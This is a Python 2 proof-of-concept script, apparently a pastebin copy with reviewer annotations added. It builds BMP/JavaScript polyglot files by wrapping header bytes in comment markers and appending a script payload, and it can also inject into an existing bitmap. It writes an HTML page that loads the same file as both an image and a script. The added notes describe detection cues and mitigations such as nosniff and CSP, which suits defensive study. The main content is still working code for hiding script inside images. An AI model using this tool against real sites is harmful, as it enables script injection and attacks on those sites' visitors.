SH1NU11b1

BMPInjector.py

Dec 4th, 2015
  1. #!/usr/bin/env python2
  2. #============================================================================================================#
  3. #======= Simply injects a JavaScript Payload into a BMP. ====================================================#
  4. #======= The resulting BMP must be a valid (not corrupted) BMP. =============================================#
  5. #======= Author: marcoramilli.blogspot.com ==================================================================#
  6. #======= Version: PoC (don't even think to use it in development env.) ======================================#
  7. #======= Disclaimer: ========================================================================================#
  8. #THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
  9. #IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
  10. #WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
  11. #DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
  12. #INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
  13. #(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
  14. #SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
  15. #HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
  16. #STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
  17. #IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
  18. #POSSIBILITY OF SUCH DAMAGE.
  19. #===========================================================================================================#
  20. import argparse
  21. import os
  22.  
  23. #---------------------------------------------------------
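  def _hexify(num):
      """
      Return *num* as a big-endian byte string with no fixed width.

      The integer is formatted with ``%x``, left-padded with a single ``0``
      when the digit count is odd, and converted from hex to raw bytes.
      The result is as short as the value allows: 0x14 gives one byte,
      0x1000 gives two.

      ``str.decode('hex')`` exists only on Python 2; ``binascii.unhexlify``
      returns the same bytes there and is also available on Python 3.
      """
      # Function-scope import so the file-level import block stays untouched.
      import binascii

      digits = "%x" % num
      if len(digits) % 2:
          # unhexlify needs whole bytes, i.e. an even number of hex digits
          digits = '0' + digits
      return binascii.unhexlify(digits)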
  32.  
  33. #---------------------------------------------------------
  34. #Example payload: "var _0xe428=[\""+ b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"]
  35. #;alert(_0xe428[0]);"
  def _generate_and_write_to_file(payload, fname):
      """
      Write a new file to *fname*: a hand-built BMP-style header, then *payload*.

      The header starts with the ``BM`` signature, but its 4-byte size field
      holds ``2F 2A 00 00``, whose first two bytes are the ASCII characters
      ``/*``. The header ends with ``2A 2F 3D 31 3B`` (``*/=1;``), so the file
      as a whole reads as ``BM/*`` + header bytes + ``*/=1;`` + payload.

      Review notes (defensive):
      - Read as a little-endian integer the size field is 0x2A2F (10799). A
        validator that compares this field with the real file length flags
        the mismatch unless the file happens to be exactly that long.
      - The data-offset field is zero, and the slot labelled "bitmap header
        size" holds ``_hexify(len(payload))``, which has no fixed width.
      - Checking only the ``BM`` magic accepts this file. Decoding an upload
        and re-encoding it into a fresh image does not carry these bytes over.

      *fname* is opened with mode "wb", so an existing file is truncated. The
      handle is closed by hand and stays open if a write raises. Always
      returns True.
      """
      f = open(fname, "wb")
      header = (b'\x42\x4D' # signature "BM"
          b'\x2F\x2A\x00\x00' # file-size field; its first two bytes are ASCII "/*"
          b'\x00\x00\x00\x00' # reserved
          b'\x00\x00\x00\x00' # bitmap data offset (left at zero)
          b''+ _hexify( len(payload) ) + # slot labelled "bitmap header size"; holds len(payload), variable width
          b'\x00\x00\x00\x14' # width: 20 pixels, arbitrary
          b'\x00\x00\x00\x14' # height: 20 pixels, arbitrary
          b'\x00\x00' # number of planes
          b'\x00\x00' # bits per pixel
          b'\x00\x10\x00\x00' # compression type
          b'\x00\x00\x00\x00' # image size (the author notes it is ignored)
          b'\x00\x00\x00\x01' # horizontal resolution
          b'\x00\x00\x00\x01' # vertical resolution
          b'\x00\x00\x00\x00' # number of colours
          b'\x00\x00\x00\x00' # number of important colours
          b'\x00\x00\x00\x80' # palette colours, to be compliant
          b'\x00\x80\xff\x80' # palette colours, to be compliant
          b'\x80\x00\xff\x2A' # palette colours; the final byte is ASCII "*"
          b'\x2F\x3D\x31\x3B' # ASCII "/=1;" -- with the "*" above this spells "*/=1;"
          )
      # Header and payload are written as two separate, explicit steps.
      f.write(header)
      f.write(payload)
      f.close()
      return True
  66.  
  67. #---------------------------------------------------------
  def _generate_launching_page(f):
      """
      Write ``run.html`` in the current working directory, referencing *f* twice.

      The page names *f* once in an ``<img src=...>`` and once in a
      ``<script src=...>``, so the same file is requested both as an image
      and as a script.

      *f* is concatenated into the markup as-is (no HTML escaping) and any
      existing ``run.html`` is overwritten. Always returns True.

      Review notes (defensive): whether the ``<script>`` reference executes
      depends on how the file is served, not on this page. Browsers that
      follow the Fetch standard refuse a script load whose response has an
      ``image/*`` MIME type, and with ``X-Content-Type-Options: nosniff`` a
      script load is refused unless the response carries a JavaScript MIME
      type. Serving user uploads from a separate origin and restricting
      ``script-src`` in a Content-Security-Policy keep an uploaded file out
      of the site's script sources.
      """

      htmlpage ="""
  <html>
  <head><title>Opening an image</title> </head>
  <body>
  <img src=\"""" + f + """\"\>
  <script src= \"""" + f + """\"> </script>
  </body>
  </html>
  """
      # Fixed output name, opened in binary write mode (truncates an existing file).
      html = open("run.html", "wb")
      html.write(htmlpage);
      html.close()
      return True
  86.  
  87. #---------------------------------------------------------
  def _inject_into_file(payload, fname):
      """
      Modify the existing file *fname* in place and append *payload* to it.

      Three open/close passes over the same path:
      1. Read the whole file into memory.
      2. Truncate it, write the bytes back, then overwrite the two bytes at
         offset 2 with ``2F 2A`` (ASCII ``/*``).
      3. Append ``FF 2A 2F 3D 31 3B`` (0xFF followed by ASCII ``*/=1;``) and
         then *payload*.

      Author's note: a BMP that already contains the bytes FF 2A may cause
      issues.

      Review notes (defensive): no backup of the original file is kept.
      Offset 2 is where the author's generated header places the size field,
      so a modified file no longer declares its true length; that mismatch,
      ``/*`` directly after the ``BM`` signature, and the marker bytes
      followed by text at the end of the file are what an upload check can
      look for. NOTE(review): whether image viewers still render the result
      is not established by this code.

      Always returns True.
      """
      # Deliberately done in separate passes instead of in memory (author's choice).
      f = open(fname, "r+b")
      b = f.read()
      # NOTE(review): replace() returns a new object and the result is not
      # assigned here, so `b` is unchanged when it is written back below.
      b.replace(b'\x2A\x2F',b'\x00\x00')
      f.close()

      # "w+b" truncates the file before the saved bytes are written back.
      f = open(fname, "w+b")
      f.write(b)
      f.seek(2,0)  # absolute offset 2: directly after the two signature bytes
      f.write(b'\x2F\x2A')
      f.close()

      # Append mode: the marker and the payload land after the existing data.
      f = open(fname, "a+b")
      f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')
      f.write(payload)
      f.close()
      return True
  111.  
  112.  
  113. #---------------------------------------------------------
  # Command-line entry point (Python 2: note the print statement at the end).
  # Positional arguments: the BMP file name and the script text to embed.
  # -i / --inject-to-existing-bmp switches from writing a new file to
  # modifying the named file in place.
  if __name__ == "__main__":
      parser = argparse.ArgumentParser()
      parser.add_argument("filename",help="the bmp file name to be generated/or infected")
      parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")
      parser.add_argument("-i", "--inject-to-existing-bmp", action="store_true", help="inject into the current bitmap")
      args = parser.parse_args()
      # The banner is printed on every run, before any file is touched.
      print("""
  |======================================================================================================|
  | [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal. |
  | It is the end user's responsibility to obey all applicable local, state and federal laws. |
  | Authors assume no liability and are not responsible for any misuse or damage caused by this program |
  |======================================================================================================|
  """)
      if args.inject_to_existing_bmp:
          _inject_into_file(args.js_payload, args.filename)
      else:
          _generate_and_write_to_file(args.js_payload, args.filename)

      # NOTE(review): the paste lost its indentation; this call is assumed to
      # run in both modes rather than only in the else branch -- confirm
      # against the original file.
      _generate_launching_page(args.filename)
      print "[+] Finished!"